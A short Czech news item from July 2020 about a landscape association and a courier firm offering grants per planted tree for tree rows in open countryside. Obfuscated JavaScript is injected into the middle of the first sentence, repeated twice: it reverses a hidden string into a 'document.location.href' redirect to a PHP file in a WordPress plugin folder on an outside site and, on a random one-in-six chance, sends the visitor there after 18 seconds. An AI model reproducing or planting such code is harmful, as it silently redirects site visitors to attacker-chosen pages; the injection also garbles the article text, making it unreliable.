Rainbow page separator

Obce i organizace mohou žádat o podporu na výsadby stromořadí

Pondělí, 6. července 2020

Počítky / Sdružení Krajina z Počítek a přepravní společnost GLS CZ i v le["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tošním roce vyhlašují výzvu k předkládání návrhů akcí zaměřených na výsadbu stromořadí ve volné krajině. Ta je určena neziskovým organizacím a obcím, přičemž finanční příspěvek na jeden vysazený strom činí 300 až 650 korun. Podrobné informace včetně návratky jsou zájemcům k dispozici na webových stránkách Sdružení Krajina, termín pro doručení vyplněné návratky je do konce srpna. Zaslané návrhy budou vyhodnoceny a pořadatelé vybraných akcí obdrží příspěvek na výsadbu. Sdružení Krajina výsadby stromořadí, remízků či větrolamů do volné krajiny podporuje již osmým rokem. Podmínkou finanční podpory je zorganizování výsadbové akce s aktivním zapojením veřejnosti na dobrovolnické bázi, výsadba minimálně pěti stromů a sázení místně původních druhů dřevin.